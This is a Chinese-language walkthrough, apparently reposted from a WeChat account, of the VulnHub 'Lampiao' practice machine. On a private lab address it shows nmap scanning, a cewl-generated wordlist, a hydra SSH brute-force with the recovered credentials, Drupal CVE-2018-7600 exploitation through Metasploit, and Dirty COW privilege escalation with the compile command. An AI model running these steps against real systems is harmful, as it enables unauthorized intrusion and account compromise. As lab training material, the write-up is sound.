使用nmap 获取目标IP访问后
nmap -sP 192.168.188.0/24
扫描服务 nmap -sS -sV -T5 -A -p- 192.168.188.128
尝试访问80端口
目录爆破没有 查看1898 端口
两个二级页面
根据url 规则,可能存在 2页面 尝试访问文件
音频 提示 user tiago
二维码解析内容 try harder 尝试进行目录爆破 发现robots文件,尝试访问 CHANGELOG.txt 发现版本信息 网站基于drupal7 搭建 cewl http://192.168.188.128:1898/?q=node/1 -w dayu.txt
使用cewl 基于页面信息生产密码字典
hydra 爆破
hydra -l tiago -P dayu.txt 192.168.188.128 ssh
得到用户密码
login: tiago password: Virgulino ssh登录成功,不能使用sudo su 提权
二、提权
根据已知的信息提取
cve-2018-7600使用msf进行渗透
查询durpal msf存在的漏洞,使用2018年的漏洞,填写配置信息
成功进入系统,获得低权限用户,反弹shell 获取root权限
使用 dirty(脏牛)提权
使用 searchsploit dirty 查找脏牛提权shell 利用40847.cpp
复制
cp /usr/share/exploitdb/exploits/linux/local/40847.cpp ~
搭建本地服务器 把40847发送到靶机上。
python2 -m SimpleHTTPServer 5555 开启服务
命令
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o 40847 40847.cpp -lutil
提权成功 获取root密码
远程root登录成功
原文始发于微信公众号(北京路劲科技有限公司):vulnhub - Lampiao靶场实战
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论